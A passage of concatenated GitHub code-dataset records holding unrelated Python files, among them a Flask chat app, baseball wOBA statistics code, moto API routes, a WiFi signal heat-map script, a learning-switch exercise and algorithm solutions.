UnboundedThreads.chalice\n# ------------------------------------------------------\n# Running tests in permission-model ...\n# ------------------------------------------------------\n# FAIL: basic.chalice\n# FAIL: channels.chalice\n# FAIL: locks.chalice\n# FAIL: peculiar.chalice\n# OK: permarith_parser.chalice\n# FAIL: permission_arithmetic.chalice\n# FAIL: predicates.chalice\n# FAIL: predicate_error1.chalice\n# FAIL: predicate_error2.chalice\n# FAIL: predicate_error3.chalice\n# FAIL: predicate_error4.chalice\n# FAIL: scaling.chalice\n# FAIL: sequences.chalice\n# ------------------------------------------------------\n# Running tests in general-tests ...\n# ------------------------------------------------------\n# FAIL: cell-defaults.chalice\n# FAIL: counter.chalice\n# FAIL: ImplicitLocals.chalice\n# FAIL: LoopLockChange.chalice\n# OK: prog0.chalice\n# FAIL: prog1.chalice\n# FAIL: prog2.chalice\n# FAIL: prog3.chalice\n# FAIL: prog4.chalice\n# FAIL: quantifiers.chalice\n# FAIL: RockBand-automagic.chalice\n# FAIL: SmokeTestTest.chalice\n# OK: VariationsOfProdConsChannel.chalice\n# ------------------------------------------------------\n# Running tests in regressions ...\n# ------------------------------------------------------\n# OK: workitem-10147.chalice\n# FAIL: workitem-10190.chalice\n# FAIL: workitem-10192.chalice\n# FAIL: workitem-10194.chalice\n# FAIL: workitem-10195.chalice\n# FAIL: workitem-10196.chalice\n# FAIL: workitem-10197.chalice\n# FAIL: workitem-10198.chalice\n# FAIL: workitem-10199.chalice\n# FAIL: workitem-10200.chalice\n# FAIL: workitem-8234.chalice\n# FAIL: workitem-8236.chalice\n# FAIL: workitem-9978.chalice\n# ------------------------------------------------------\n# SUMMARY: 58 of 62 tests failed.\n# \"\"\"","repo_name":"ggrov/tacny","sub_path":"boogie-partners/Aste/aste/workers/chaliceworkers.py","file_name":"chaliceworkers.py","file_ext":"py","file_size_in_byte":12749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"25655063785","text":"line = input()\nnumbers = line.split(\" \")\nn = int(numbers[0])\nmax = int(numbers[1])\n\nline = input()\nlList = line.split(\" \")\nd, count = 0, 1\nfor i in range(n):\n d += int(lList[i])\n if d <= max:\n count += 
1\n\nprint(count)","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC130/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"29442091510","text":"import os\nfrom time import localtime, strftime\nfrom flask import Flask, render_template, redirect, url_for, flash, request, session, jsonify\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room\nfrom werkzeug.utils import secure_filename\nfrom flask import send_from_directory\n\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = 'Super_secret_key'\nsocketio = SocketIO(app)\n# Create predefined rooms\nROOMS = []\nmesage = {}\n\nUPLOAD_FOLDER = './static/uploads'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n# app.config['WTF_CSRF_SECRET_KEY'] = \"b'f\\xfa\\x8b{X\\x8b\\x9eM\\x83l\\x19\\xad\\x84\\x08\\xaa\"\n\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/upload-file', methods=['POST'])\ndef upload_file():\n    if request.method == 'POST':\n        # check if the post request has the file part\n        if 'file' not in request.files:\n            flash('No file part')\n            return redirect(url_for('index'))\n        file = request.files['file']\n        # if user does not select file, browser also\n        # submit an empty part without filename\n        if file.filename == '':\n            flash('No selected file')\n            return redirect(url_for('index'))\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            return jsonify({'filename': filename})\n\n@app.route('/uploads/<filename>')\ndef uploaded_file(filename):\n    return send_from_directory(app.config['UPLOAD_FOLDER'],\n                               filename)\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n    login = 'loggedout'\n    username = ''\n    if 'username' in session:\n        login = 'loggedin'\n        username = session['username']\n    else:\n        return redirect(url_for('login'))\n\n    return render_template('chat.html', username=username, login=login, ROOMS=ROOMS)\n\n\n@app.route('/get-rooms', methods=['GET', 'POST'])\ndef get_rooms():\n    if 'username' not in session:\n        flash(\"Please login\", 'danger')\n        return redirect(url_for('login'))\n\n    if request.method == \"GET\":\n        return jsonify({'rooms': ROOMS})\n    else:\n        room = request.form['room'].lower()\n\n        if room not in ROOMS:\n            ROOMS.append(room)\n            mesage[room] = []\n\n        return jsonify({'success': 'Room created'})\n\n@app.route('/get-messages', methods=['POST'])\ndef get_messages():\n    if 'username' not in session:\n        flash(\"Please login\", 'danger')\n        return redirect(url_for('login'))\n\n    room = request.form['room'].lower()\n\n    # return the stored history for known rooms, an empty list otherwise\n    if room in mesage:\n        return jsonify({'messages': mesage[room]})\n\n    return jsonify({'messages': []})\n\n\n@app.route('/login',methods=['GET','POST'])\ndef login():\n    if request.method=='POST':\n        session['username']=request.form['username']\n        return redirect(url_for('index'))\n    return render_template('login.html')\n\n\n@app.route('/logout')\ndef logout():\n    session.pop('username',None)\n    flash(\"You have logged out successfully\", \"success\")\n    return redirect(url_for('login'))\n\n\n# server-side event handler to receive/send 
messages\n@socketio.on('message')\ndef message(data):\n    x = data\n    x['time_stamp'] = strftime('%b-%d %I:%M%p', localtime())\n    # room names are stored lower-cased, so normalise the key before the lookup\n    if data['room'].lower() in mesage:\n        if len(mesage[data['room'].lower()]) < 5:\n            mesage[data['room'].lower()].append(x)\n        else:\n            mesage[data['room'].lower()].pop(0)\n            mesage[data['room'].lower()].append(x)\n\n    send({'msg': data['msg'], 'username': data['username'],\n          'time_stamp': strftime('%b-%d %I:%M%p', localtime())}, room=data['room'].lower())\n\n\n# server-side event handler to join the room\n@socketio.on('join')\ndef join(data):\n    if ROOMS:\n        join_room(data['room'])\n        send({\"msg\": data['username'] + \" has joined the \" + data['room'] + \" room.\"}, room=data['room'])\n\n\n# server-side event handler to leave the room\n@socketio.on('leave')\ndef leave(data):\n    leave_room(data['room'])\n    send({\"msg\": data['username'] + \" has left the \" + data['room'] + \" room.\"}, room=data['room'])\n\n\n@socketio.on(\"create room\")\ndef create(data):\n    room = data[\"room\"]\n    join_room(room)\n    emit(\"creation\", {\"room\": room}, broadcast=True)\n\n\nif __name__ == '__main__':\n    port = int(os.environ.get('PORT', 5000))\n    # app.run(host='0.0.0.0', port=port, debug=True)\n    socketio.run(app, host='0.0.0.0', port=port)\n","repo_name":"MotazBellah/sc50p2","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"28651618876","text":"import parsestats\nimport alchemy\nimport calculateleaguewidestats\nimport linear_weights_constants\n\ndef create_league(league_name):\n    players = parsestats.parse_data(league_name + '.csv')\n    if players == False:\n        return False\n\n    p = alchemy.Players()\n    for player in players:\n        p.writeData(player, league_name)\n\n    return True\n\n\ndef update_player_raa(players, constants):\n    for player in players:\n        outcomes = calculateleaguewidestats.create_player_outcomes(player)\n        player.RAA = linear_weights_constants.calculate_raa(constants, outcomes)\n        alchemy.update_player_RAA(player)\n\ndef get_woba_weights(linear_weights):\n    \"\"\"Function to convert basic linear weights to linear weights for calculating wOBA\"\"\"\n    o = -1 * linear_weights[\"O\"]\n    return {\"W\": linear_weights[\"W\"] + o, \"S\": linear_weights[\"S\"] + o, \"D\": linear_weights[\"D\"] + o, \"T\": linear_weights[\"T\"] + o, \"H\": linear_weights[\"H\"] + o}\n\ndef get_league_woba(woba_weights, league_name):\n    \"\"\"Gets the league wide wOBA without weighting it in order to normalize it\"\"\"\n    # probabilities = use_database.get_league_stats(table_name)\n    # linear_weights = linear_weights_constants.get_linear_weights_constants(10e-8, probabilities)\n    # woba_weights = get_woba_weights(linear_weights)\n\n    players = alchemy.Players()\n\n    output = players.readLeagueWideStats(league_name)\n    \n\n    \n    return (output[1] * woba_weights[\"S\"] + output[2] * woba_weights[\"D\"] + output[3] * woba_weights[\"T\"] + output[4] * woba_weights[\"H\"] + output[5] * woba_weights[\"W\"]) / (output[0] + output[5])\n\n\ndef get_woba_scale(league_woba, desired_average = .300):\n    \"\"\"Returns the wOBA scale to multiply unweighted player wOBAs by\"\"\"\n    return desired_average / league_woba\n\ndef calculate_player_woba(player_outcomes, woba_weights, woba_scale):\n    \"\"\"Calculates the weighted on base average for a player\"\"\"\n    total_pa = player_outcomes[\"W\"] + player_outcomes[\"S\"] + player_outcomes[\"D\"] + player_outcomes[\"T\"] + player_outcomes[\"H\"] + 
player_outcomes[\"O\"]\n # players with no plate appearances will be listed to have a 0 woba\n if total_pa == 0:\n return 0\n unscaled_woba = (player_outcomes[\"W\"] * woba_weights[\"W\"] + player_outcomes[\"S\"] * woba_weights[\"S\"] + player_outcomes[\"D\"] * woba_weights[\"D\"] + player_outcomes[\"T\"] * woba_weights[\"T\"] + player_outcomes[\"H\"] * woba_weights[\"H\"]) / total_pa\n return unscaled_woba * woba_scale\n\ndef update_player_woba(players, constants, table_name):\n \"\"\"Updates wOBA for all players in a table\"\"\"\n # players = use_database.get_all_players(table_name)\n # probabilities = use_database.get_league_stats(table_name)\n # constants = linear_weights_constants.get_linear_weights_constants(10e-8, probabilities)\n woba_weights = get_woba_weights(constants)\n league_woba = get_league_woba(woba_weights, table_name)\n woba_scale = get_woba_scale(league_woba)\n\n for player in players:\n outcomes = calculateleaguewidestats.create_player_outcomes(player)\n player.wOBA = calculate_player_woba(outcomes, woba_weights, woba_scale)\n alchemy.update_player_wOBA(player)\n\ndef overwrite_league(league_name):\n alchemy.delete_league(league_name)\n league_success = create_league(league_name)\n if not league_success:\n return False\n\n update_all_stats(league_name)\n return True\n\ndef update_all_stats(table_name):\n players = alchemy.get_filtered_sorted_players(table_name)\n probabilities = alchemy.get_league_stats(table_name)\n constants = linear_weights_constants.get_linear_weights_constants(10e-8, probabilities)\n\n update_player_raa(players, constants)\n update_player_woba(players, constants, table_name)\n \n \nif __name__ == \"__main__\":\n overwrite_league(\"rock_2022\")","repo_name":"Joshua6h/wOBA-calculator","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32304079431","text":"from .responses import MotoAPIResponse\nfrom .recorder.responses import RecorderResponse\n\nurl_bases = [\"https?://motoapi.amazonaws.com\"]\n\nresponse_instance = MotoAPIResponse()\nrecorder_response = RecorderResponse()\n\nurl_paths = {\n \"{0}/moto-api/$\": response_instance.dashboard,\n \"{0}/moto-api/data.json\": response_instance.model_data,\n \"{0}/moto-api/reset\": response_instance.reset_response,\n \"{0}/moto-api/reset-auth\": response_instance.reset_auth_response,\n \"{0}/moto-api/seed\": response_instance.seed,\n \"{0}/moto-api/static/athena/query-results\": response_instance.set_athena_result,\n \"{0}/moto-api/static/inspector2/findings-results\": response_instance.set_inspector2_findings_result,\n \"{0}/moto-api/static/sagemaker/endpoint-results\": response_instance.set_sagemaker_result,\n \"{0}/moto-api/static/rds-data/statement-results\": response_instance.set_rds_data_result,\n \"{0}/moto-api/state-manager/get-transition\": response_instance.get_transition,\n \"{0}/moto-api/state-manager/set-transition\": response_instance.set_transition,\n \"{0}/moto-api/state-manager/unset-transition\": response_instance.unset_transition,\n \"{0}/moto-api/recorder/reset-recording\": recorder_response.reset_recording,\n \"{0}/moto-api/recorder/start-recording\": recorder_response.start_recording,\n \"{0}/moto-api/recorder/stop-recording\": recorder_response.stop_recording,\n \"{0}/moto-api/recorder/upload-recording\": recorder_response.upload_recording,\n \"{0}/moto-api/recorder/download-recording\": recorder_response.download_recording,\n 
\"{0}/moto-api/recorder/replay-recording\": recorder_response.replay_recording,\n}\n","repo_name":"getmoto/moto","sub_path":"moto/moto_api/_internal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"73022469585","text":"import pandas as pd\r\nimport numpy as np\r\nimport folium\r\nfrom folium.plugins import HeatMap\r\nimport json\r\nimport subprocess\r\n\r\ndef mapa_de_calor():\r\n subprocess.call('cls', shell=True)\r\n # Parsear el JSON\r\n #data = json.loads(json_data)\r\n # Leer datos del archivo JSON\r\n with open('informacion.json') as file:\r\n data = json.load(file)\r\n\r\n \r\n # Obtener todos los SSIDs y sus correspondientes \"bssid 1\" presentes en el JSON\r\n ssids = []\r\n for entry in data:\r\n redes_wifi = entry[\"redes_wifi\"]\r\n for red_wifi in redes_wifi:\r\n if \"ssid\" in red_wifi and \"bssid 1\" in red_wifi:\r\n ssid = red_wifi[\"ssid\"]\r\n bssid = red_wifi[\"bssid 1\"]\r\n ssids.append((ssid, bssid))\r\n\r\n # Eliminar duplicados y mostrar los SSIDs numerados con su \"bssid 1\" entre paréntesis\r\n print(\"\\n\\nSSID obtenidos\\n---\\n\")\r\n ssids_unicos = list(set(ssids))\r\n for i, (ssid, bssid) in enumerate(ssids_unicos, start=1):\r\n print(f\"{i}. {ssid} ({bssid})\")\r\n\r\n # Solicitar al usuario el número del SSID seleccionado\r\n opcion = int(input(\"\\nSeleccione el número del SSID que desea seguir: \"))\r\n ssid_seleccionado = ssids_unicos[opcion - 1][0]\r\n print(f\"\\nEl SSID Seleccionado es: {ssid_seleccionado}\\n\")\r\n output = input(\"Nombre del output(Default map): \")\r\n if output == \"\":\r\n output = \"map\"\r\n\r\n # Obtener coordenadas y fuerza de señal\r\n coords = []\r\n signal_strengths = []\r\n coords_filtered = []\r\n signal_strengths_filtered = []\r\n\r\n\r\n for entry in data:\r\n ubicacion = entry[\"ubicacion\"]\r\n redes_wifi = entry[\"redes_wifi\"]\r\n found_ssid = False\r\n \r\n for red_wifi in redes_wifi:\r\n if \"ssid\" in red_wifi and red_wifi[\"ssid\"] == ssid_seleccionado:\r\n found_ssid = True\r\n if \"seal\" in red_wifi:\r\n seal = red_wifi[\"seal\"]\r\n signal_strength = int(seal.strip(\"%\"))\r\n \r\n if signal_strength < 21:\r\n signal_strengths_filtered.append(signal_strength)\r\n else:\r\n signal_strengths_filtered.append(min(signal_strength + 49, 100))\r\n \r\n coords_filtered.append(ubicacion)\r\n \r\n if not found_ssid:\r\n coords_filtered.append(None)\r\n signal_strengths_filtered.append(None)\r\n \r\n coords_filtered.append([90,90])\r\n signal_strengths_filtered.append(0)\r\n coords_filtered.append([-90,90])\r\n signal_strengths_filtered.append(100)\r\n\r\n # Crear el DataFrame\r\n df = pd.DataFrame({'latitud': [coord[0] if coord is not None else None for coord in coords_filtered],\r\n 'longitud': [coord[1] if coord is not None else None for coord in coords_filtered],\r\n 'fuerza de señal': signal_strengths_filtered})\r\n \r\n # Eliminar filas con valores NaN\r\n df.dropna(subset=['latitud', 'longitud', 'fuerza de señal'], inplace=True)\r\n\r\n\r\n # Filtrar filas duplicadas y con diferencias menores a 0.000050 en latitud o longitud (No funciona correctamente las elimina por completo)\r\n #df = df.groupby(['latitud', 'longitud']).filter(lambda x: (x.shape[0] == 1) or\r\n # ((x['latitud'].max() - x['latitud'].min()) > 0.000050) or\r\n # ((x['longitud'].max() - x['longitud'].min()) > 0.000050))\r\n \r\n\r\n # Eliminar filas duplicadas basadas en latitud y longitud\r\n 
df.drop_duplicates(subset=['latitud', 'longitud'], keep='first', inplace=True)\r\n\r\n\r\n    # Build the heat map\r\n    mapa = folium.Map(location=[np.mean(df['latitud'][:-2]), np.mean(df['longitud'][:-2])], zoom_start=100)\r\n\r\n    capa_calor = folium.FeatureGroup(name='Mapa de calor')\r\n    capa_calor.add_child(HeatMap(data=df[['latitud', 'longitud', 'fuerza de señal']].values.tolist(), radius=15))\r\n    mapa.add_child(capa_calor)\r\n\r\n    leyenda = folium.features.GeoJson(\r\n        data={\r\n            'type': 'FeatureCollection',\r\n            'features': [{\r\n                'type': 'Feature',\r\n                'properties': {\r\n                    'name': 'Leyenda',\r\n                    'description': 'Fuerza de señal'\r\n                },\r\n                'geometry': {\r\n                    'type': 'Point',\r\n                    'coordinates': [np.mean(df['latitud']), np.mean(df['longitud'])]\r\n                }\r\n            }]\r\n        },\r\n        style_function=lambda x: {\r\n            'color': 'black',\r\n            'weight': 2,\r\n            'fillColor': '#ffae42',\r\n            'fillOpacity': 0.7\r\n        }\r\n    ).add_to(mapa)\r\n\r\n    output = output + \".html\"\r\n    mapa.save(output)","repo_name":"barricadadigital/GeoWifi","sub_path":"mapacalor.py","file_name":"mapacalor.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"37992017098","text":"import pandas as pd\nfrom script_calc import Calc\n\npd.set_option('display.max_columns', 500)\npd.set_option('display.max_rows', 500)\npd.set_option('display.width', 500)\n\nc = Calc()\ndata = c.load_data('LGI_Homes')\nrevenue = c.get_line(data, c.income_statement, 'Home sales', 'Sales')\ncost_of_sales = c.get_line(data, c.income_statement, 'Cost of sales', 'Cost of Sales')\nga = c.get_line(data, c.income_statement, 'General and administrative', 'G&A')\nprofit = c.get_line(data, c.income_statement, 'Net income', 'Profit')\noperating_cash_flow = c.get_line(data, c.cash_flow, 'operating activities', 'Operating Cash Flow')\neps = c.get_line(data, c.income_statement, 'Diluted', 'Diluted EPS')\ninventory = c.get_line(data, c.balance_sheet, 'Real estate inventory', 'Inventory')\nassets_less_cash = c.get_and_operate_on_lines(data, c.balance_sheet, ['Total assets',\n                                                                     'Cash and cash equivalents'],\n                                              'Assets less Cash',\n                                              False)\nequity = c.get_line(data, c.balance_sheet, 'Total equity', 'Equity')\nowners_earnings = c.get_and_operate_on_lines(data, c.cash_flow, ['Net income',\n                                                                 'Depreciation',\n                                                                 'Purchases',\n                                                                 'business acquisition',\n                                                                 'unconsolidated'],\n                                             \"Owner's Earnings\")\nretained_earnings = c.get_line(data, c.balance_sheet, 'Retained earnings', 'Retained Earnings')\n\nresults = pd.concat([revenue,\n                     cost_of_sales,\n                     ga,\n                     profit,\n                     inventory,\n                     assets_less_cash,\n                     equity]).dropna(axis=1)\n\n# Earnings\nearnings = pd.concat([revenue,\n                      profit,\n                      owners_earnings,\n                      retained_earnings,\n                      eps,\n                      operating_cash_flow]).dropna(axis=1)\n# ratios\nratios = c.operate_on_results_onto_new_df(results, pd.DataFrame(), 'G&A', 'Sales', c.divide, 'G&A Margin')\nratios = c.operate_on_results_onto_new_df(results, ratios, 'Cost of Sales', 'Inventory', c.divide, 'Inventory Turnover')\n\n# Returns\nreturns = c.operate_on_results_onto_new_df(results, pd.DataFrame(), 'Profit', 'Assets less Cash', c.divide, 'ROALC')\nreturns = c.operate_on_results_onto_new_df(results, returns, 'Profit', 'Equity', c.divide, 
'ROE')\n\nprint(earnings)\nprint(ratios)\nprint(returns)\n","repo_name":"zenonfoo/portfolio","sub_path":"financial_statement_scrape_2/statements/LGI_Homes/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"3303461043","text":"def max_finder(seq):\r\n\ttracker = [0 for i in range(len(seq))]\r\n\tmax_count = 0\r\n\tfor i in range(1, len(tracker)):\r\n\t\tif seq[i] > seq[i-1]:\r\n\t\t\ttracker[i] = tracker[i-1] + 1\r\n\t\telse:\r\n\t\t\ttracker[i] = 0\r\n\tfor i in range(1, len(tracker)):\r\n\t\tif tracker[i] == 0:\r\n\t\t\tif seq[i-2] < seq[i]:\r\n\t\t\t\tif i+1 < len(seq) and 0 in tracker[i+1:]:\r\n\t\t\t\t\taddable = tracker[tracker.index(0, i+1) - 1]\r\n\t\t\t\telse:\r\n\t\t\t\t\taddable = tracker[-1]\r\n\t\t\t\ttemp_max = tracker[i-1] + addable\r\n\t\t\t\tif temp_max > max_count:\r\n\t\t\t\t\tmax_count = temp_max\r\n\t\t\tif i+1 < len(seq) and seq[i-1] < seq[i+1]:\r\n\t\t\t\tif i+1 < len(seq) and 0 in tracker[i+1:]:\r\n\t\t\t\t\taddable = tracker[tracker.index(0, i+1) - 1]\r\n\t\t\t\telse:\r\n\t\t\t\t\taddable = tracker[-1]\r\n\t\t\t\ttemp_max = tracker[i-1] + addable\r\n\t\t\t\tif temp_max > max_count:\r\n\t\t\t\t\tmax_count = temp_max\r\n\tif max_count == 0:\r\n\t\tmax_count = max(tracker)\r\n\t\tif max_count == 0:\r\n\t\t\treturn 0\r\n\treturn max_count + 1\r\n\t\t\t\r\nuseless = input()\t\t\r\nnumbers = input().split()\r\nfor i in range(len(numbers)):\r\n\tnumbers[i] = int(numbers[i])\r\nprint(max_finder(numbers))","repo_name":"Infinidrix/competitive-programming","sub_path":"Day 17/q4_improved.py","file_name":"q4_improved.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"43517408852","text":"# Given integers S and K, Sejun wants to find K positive integers whose sum is S. If there are several such sets, he wants to make their product as large as possible.\r\n#\r\n# Print the maximum possible product.\r\n#\r\n# For example, if S=10 and K=3, then 3, 3, 4 gives the maximum product, 36.\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nS, K = map(int, input().strip().split())\r\narr = [S // K for i in range(K)]\r\n\r\nwhile True:\r\n    if sum(arr) == S:\r\n        break\r\n    else:\r\n        arr[-1] += 1\r\n        arr.sort(reverse = True)\r\n\r\nresult = 1\r\nfor i in arr:\r\n    result *= i\r\nprint(result)","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"1000~1999/1500.py","file_name":"1500.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"33303371249","text":"from Utils import get_config, CONFIG_FILE\nfrom XAIRecommender import XAIRecommender\nfrom XAIRInitializer import XAIRInitializer\nfrom flask import Flask, request, send_from_directory\nfrom flask_cors import CORS\n\n# using flask instead of flask_restful, since there are only two routes\napp = Flask(__name__)\n\n# allowing all http requests and origins\ncors = CORS(app)\n\nrecommender = XAIRecommender(verbose=False, reload=True)\n\n\n@app.route('/xairecommender', methods=[\"POST\"])\ndef post():\n    \"\"\"\n    Receives POST request (e.g. 
from frontend application)\n @returns recommendation object for given request parameters\n \"\"\"\n\n validator = recommender.rec_sim.input_validator\n\n inputs = request.get_json()\n\n\n if not validator.validate(inputs):\n return validator.errors, 400\n\n recommendation, inputs_processed = recommender.make_recommendation(inputs, return_inputs=True)\n\n excl = recommender.get_method_information()[1]\n html, _ = recommender.get_active_rules()\n\n return {\n \"recommendation\": recommendation,\n \"active_rules\": html,\n \"excluded_methods\": excl,\n \"inputs_orig\": inputs,\n \"inputs_processed\": inputs_processed\n }\n\n\n@app.route(\"/config\", methods=[\"GET\"])\ndef get_configuration():\n \"\"\"\n Get recommendation for given ID\n \"\"\"\n dir, file_name = get_config().resource_files.frontend_input_config.rsplit(\"/\", 1)\n print(f\"dir: {dir}, file: {file_name}\")\n return send_from_directory(dir, file_name)\n\n\nif __name__ == '__main__':\n # run webapp\n app.run(debug=True, host=\"0.0.0.0\", port=5000, threaded=True)\n","repo_name":"viadee/xair","sub_path":"xai_xps/src/starter_webapp.py","file_name":"starter_webapp.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"15763998344","text":"#! /usr/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nsns.set()\n#%%\n# k = 0\nnx, nt = 500, 500\n\neps = 1E-3\n\nliP = [0.99, -0.99, 0.01]\n\nRESes = []\nT_spec = [ np.linspace(0 + 0.01, 0 + 0.28 , nt),\n np.linspace(0 + 0.01, 0 + 0.28 , nt),\n np.linspace(0 + 0.01, 0 + 0.28 , nt)\n ]\nfor kP in range(len(liP)):\n P = liP[kP]\n P_res = []\n for kTv in T_spec[kP]:\n while True:\n dx = 1/nx # each slice\n # print(dx)\n nume, deli = 0, 0\n\n for k in range(nx):\n x = k*dx # current loc\n ak = 1.5*x**2 - 0.5\n bk = ak / (kTv)\n nume += ak*np.exp(bk*P)\n deli += np.exp(bk*P)\n P_src = P\n P = nume / deli\n if np.abs(P_src - P) < eps:\n P_res.append(P)\n break\n RESes.append(P_res)\n print(\"Init point: % 5.3f\"%P)\n for k in np.arange(0,len(T_spec[kP])):\n print(\"% 5.5f\"%T_spec[kP][k], \" : \", \"% 5.5f\"%P_res[k])\n\n#%%\nplt.figure(figsize = (10,7))\nplt.plot(T_spec[0], RESes[0], '-', T_spec[1], RESes[1], '-',T_spec[2], RESes[2], '-')\nplt.show()\n","repo_name":"pigtamer/LCD_Assignment","sub_path":"entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21296155436","text":"'''\r\nEthernet learning switch in Python.\r\n\r\nNote that this file currently has the code to implement a \"hub\"\r\nin it, not a learning switch. 
(I.e., it's currently a switch\r\nthat doesn't learn.)\r\n'''\r\nimport switchyard\r\nfrom switchyard.lib.userlib import *\r\n\r\n\r\ndef main(net: switchyard.llnetbase.LLNetBase):\r\n    my_interfaces = net.interfaces()\r\n    mymacs = [intf.ethaddr for intf in my_interfaces]\r\n\r\n    # Table!!\r\n    trtable = {}\r\n\r\n    while True:\r\n        try:\r\n            _, fromIface, packet = net.recv_packet()\r\n        except NoPackets:\r\n            continue\r\n        except Shutdown:\r\n            break\r\n\r\n        log_debug (f\"In {net.name} received packet {packet} on {fromIface}\")\r\n        eth = packet.get_header(Ethernet)\r\n        if eth is None:\r\n            log_info(\"Received a non-Ethernet packet?!\")\r\n            return\r\n\r\n        # Table!! (the None check above must run before eth.src is touched; evict the least-used entry when the table is full)\r\n        if eth.src not in trtable:\r\n            if len(trtable) == 5:\r\n                k = min(trtable.items(), key=lambda x: x[1][1])[0]\r\n                trtable.pop(k)\r\n            trtable[eth.src] = [fromIface, 0]\r\n\r\n        if eth.dst in mymacs:\r\n            log_info(\"Received a packet intended for me\")\r\n            continue\r\n\r\n        # Table!!\r\n        if eth.dst in trtable:\r\n            target = trtable.get(eth.dst)[0]\r\n            trtable.get(eth.dst)[1] += 1\r\n            log_info (f\"Get MAC from mytable, MAC: {eth.dst} is at {target}\")\r\n            log_info (f\"Send packet {packet} to {target}\")\r\n            net.send_packet(target, packet)\r\n        else:\r\n            for intf in my_interfaces:\r\n                if fromIface != intf.name:\r\n                    log_info (f\"Flooding packet {packet} to {intf.name}\")\r\n                    net.send_packet(intf, packet)\r\n\r\n        print (trtable)\r\n    net.shutdown()\r\n","repo_name":"SonicoGO/Computer-Network","sub_path":"lab-02-Switch/myswitch_traffic.py","file_name":"myswitch_traffic.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71725298066","text":"\"\"\"\nGiven a 2D grid board and a list of dictionary words words, find all words that appear in both the grid and the dictionary.\n\nA word must be constructed from letters of sequentially adjacent cells,\nwhere \"adjacent\" cells are horizontally or vertically neighboring. The same cell may not be used more than once within one word.\n\nInput:\nwords = [\"oath\",\"pea\",\"eat\",\"rain\"] and board =\n[\n  ['o','a','a','n'],\n  ['e','t','a','e'],\n  ['i','h','k','r'],\n  ['i','f','l','v']\n]\n\nOutput: [\"eat\",\"oath\"]\n\"\"\"\n\nclass Solution:\n    def findWords(self, board, words):\n        trie = {}\n\n        for word in words:\n            node = trie\n\n            # build the trie path for each word\n            for char in word:\n                if char not in node:\n                    node[char] = {}\n                node = node[char]\n            node[\"finish\"] = word\n\n        # because the trie is pruned below once a word has been matched, duplicate answers cannot be added\n        self.res = []\n        for i in range(len(board)):\n            for j in range(len(board[0])):\n                if board[i][j] in trie:\n                    self.dfs(i, j, trie, board)\n\n        return self.res\n\n    def dfs(self, i, j, node, board):\n        cur = board[i][j]\n        \"\"\"\n        1.\n        The node for the last letter of a word contains only {finish: word}.\n        If we have reached the last letter of a word, pop returns that word and we record it;\n        if we have not, pop returns the default value False.\n        The problem implicitly assumes each word can be found only once per board, so once a word is found we pop it,\n        e.g. {a:{b:{finish:ab}}} -> {a:{b:{}}}, and the empty node is cleaned up at 2. below\n        \"\"\"\n        isLast = node[cur].pop(\"finish\", False)\n        if isLast:\n            self.res.append(isLast)\n\n        # mark this cell as visited so the current DFS will not use it again\n        board[i][j] = \"#\"\n        for x, y in [[-1, 0], [1, 0], [0, -1], [0, 1]]:\n            newi = i + x\n            newj = j + y\n\n            # recurse only when the neighbour is inside the board and extends a word in the trie\n            if 0 <= newi <= len(board) - 1 and 0 <= newj <= len(board[0]) - 1 and board[newi][newj] in node[cur]:\n                self.dfs(newi, newj, node[cur], board)\n        # this DFS is finished, so unmark the cell for later searches to use\n        board[i][j] = cur\n\n        \"\"\"\n        2. If the trie now looks like this, pop b:{} to shorten future lookups:\n        {a:{b:{}}} -> {a:{}}\n        \"\"\"\n        if node[cur] == {}:\n            node.pop(cur)\n\n# Link: https://leetcode.cn/problems/word-search-ii/solution/python3-dfs-by-trojanmaster-7zmx/\n# the version from 古城算法 (GuCheng Algorithm) timed out","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Trie(字典树)/212. 
